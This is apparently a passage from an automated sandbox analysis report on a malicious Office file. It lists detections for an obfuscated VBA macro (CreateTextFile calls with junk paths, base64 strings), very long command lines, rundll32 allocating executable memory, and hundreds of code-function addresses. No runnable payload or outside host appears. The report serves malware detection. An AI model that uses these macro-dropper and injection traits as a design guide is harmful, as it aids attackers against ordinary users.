                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set HCvCmAcHC = iFTmFHFH.CreateTextFile("shCgAEb:\vCjFDhHuA\RhZGDG.mHWOGnIf")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set gEcrV = RqlOZAHRJ.CreateTextFile("HQGixyC:\vETCeBG\zIuEqsGG.NobmDA")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set ZMdrVHGz = xsruLB.CreateTextFile("EEnWBhBO:\VaTRC\McdbPkJ.cvwiQ")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fDZVKAAc = tzErBRFe.CreateTextFile("RcEcpI:\TGsCxLC\hxAZEBGHI.oETVAFo")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set rYbgBh = hZCth.CreateTextFile("fYRUCAB:\VWWOMB\QmLUE.hKgcGBDCJ")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set GfRPP = xLQtMd.CreateTextFile("RyteBlQC:\fuQXAW\oueKCbIJ.WivEYJD")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set sCOIGDtD = eepvDEaE.CreateTextFile("KlvicF:\bJfMJhqw\dAgvkWD.xDxpHH")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set fmwdEMADQ = DkLoDL.CreateTextFile("pGMMG:\enlVVB\fMqiFP.kEIECDZHz")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set pkixJADG = DhnHIY.CreateTextFile("rfyIZCD:\OrugCDDGG\qkyWDBUAH.gjwVDBALW")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String createtextfile: Set KmGOADt = CFdSBD.CreateTextFile("HWdKFJOBf:\UYiqcEIJ\rLoNox.YKOSA")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set PbhYVsA = PcHRGIADo.CreateTextFile("OiBXGJB:\pnqsZEDV\gsZoAW.EePnB")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set NuebA = sTzDC.CreateTextFile("OBoYzRpef:\sDLuJ\bmIQSG.MdmDR")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set gxBPJB = zxgLHJSFW.CreateTextFile("KGGMcAB:\uaMWhFR\mhdIDlEH.PDxHAHD")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String createtextfile: Set mgrwfmN = RjiQHRA.CreateTextFile("CxQnJUo:\GongJKJ\vntyZI.ugzmBCOCC")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set uWZkeMFv = zDsRaIBGF.CreateTextFile("NFKiIDO:\sBRpIz\FFqJD.QevLKGfGs")
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String createtextfile: Set iHKuDmaEr = OMZxxg.CreateTextFile("QWqEKJnW:\BQVnVKF\gWdSBXA.TabDJBD")
                      Document contains an embedded VBA with base64 encoded stringsShow sources
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String uTtCAFwHpCGF
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String lwWhZGEasjsS
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String MiCjaGqJfPrI
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String KqVyuQQfwTWh
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String mehEFPFHcklgJDDx
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String wypNISsWSXthFJCq
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function G8xesq0b8jlsfrsp, String LvnHAGHfIhRDBRAF
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NeiIGCNWgICn
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Jlda77h_v8nx5, String NisSEYrcDlKQUITa
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String nJJzFRjEWpRikxCD
                      Source: VBA code instrumentationOLE, VBA macro: Module Owppnp8hah4xo788, Function Hrs2a1p95u19, String oLweAMoGsqVE
                      Very long command line foundShow sources
                      Source: unknownProcess created: Commandline size = 5709
                      Source: unknownProcess created: Commandline size = 5613
                      Source: C:\Windows\System32\cmd.exeProcess created: Commandline size = 5613
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Shuwftk\Jump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_1000976F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021B41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00212C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00223895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021C0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021EE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002202C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002242DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00218736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00217B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00224B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021F444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021E05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002160B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002180BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002148BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002188E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00211CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002220C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00220D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00227D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00228D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00225D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002169A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002261B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00226DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00229586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00217998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00216D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002231E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002271EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00212A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00214A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00219A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00227A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00225A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021EA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002162A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00211280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002212E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002226F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002196CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00228ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00220F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00222B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00227F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00220B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00221773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00215B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00218F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00229B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00222349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00228F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00216754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002117AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002273AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0022878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00223FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_0021D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002267E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_002263C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00221BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_00219FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032B41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032EE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00322C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00333895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003342DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003302C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032C0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00328736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00327B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00334B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003363C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00322A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00329A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00324A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0033340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00337A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0033687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00335A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032E05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032F444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032EA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003280BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003260B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003248BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003262A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0033A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0033889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00321280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003326F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00321CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003312E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003288E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00338ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003320C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003296CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00330D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032F536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032BB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032B112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00332B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0033511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00337F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00335D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00338D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00337D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00330F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00331773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032E377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00328F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00325B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032C769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00330B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00326754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032B75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00339B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00332349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00338F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00336DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003361B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003269A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003217AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003373AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00327998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00326D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00339586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0033878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032F98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003331E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00333FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_0032D7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003367E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_003371EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00331BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 8_2_00329FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00203895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002002C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002042DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00204B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002063C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00207A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00205A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002012E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002026F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002020C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00208ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00200D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00207D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FBB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00200F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00202B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00208D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00205D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00207F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00200B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00201773
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00209B45
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F5B79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F8F78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FE377
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00202349
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00208F49
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FC769
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F6D9F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F839D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F7998
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002073AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FF98C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002061B8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00206DB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00209586
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_0020878F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F17AC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F69A0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002031E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001F9FDC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00203FE7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002067E9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_002071EF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_001FD7EB
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 9_2_00201BDF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FB41F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FEE78
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F2C63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F568E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00203895
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FC0C6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002002C3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002042DA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F8736
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00204B41
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F7B63
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002063C1
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F9A37
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020340A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F4A35
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F2A30
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00207A0F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00205A61
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FE05A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FEA4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FF444
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020687F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020A0AF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F1280
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F48BD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F80BA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F60B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F62A3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020889D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002012E2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F96CD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002026F5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F1CFA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_002020C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F88E5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00208ADC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FB112
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00200D33
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F153C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00207D03
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FBB3A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FF536
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00200F0C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00202B16
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_0020511B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00208D1C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00205D1D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00207F1F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001FB75F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_00200B68
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 10_2_001F6754
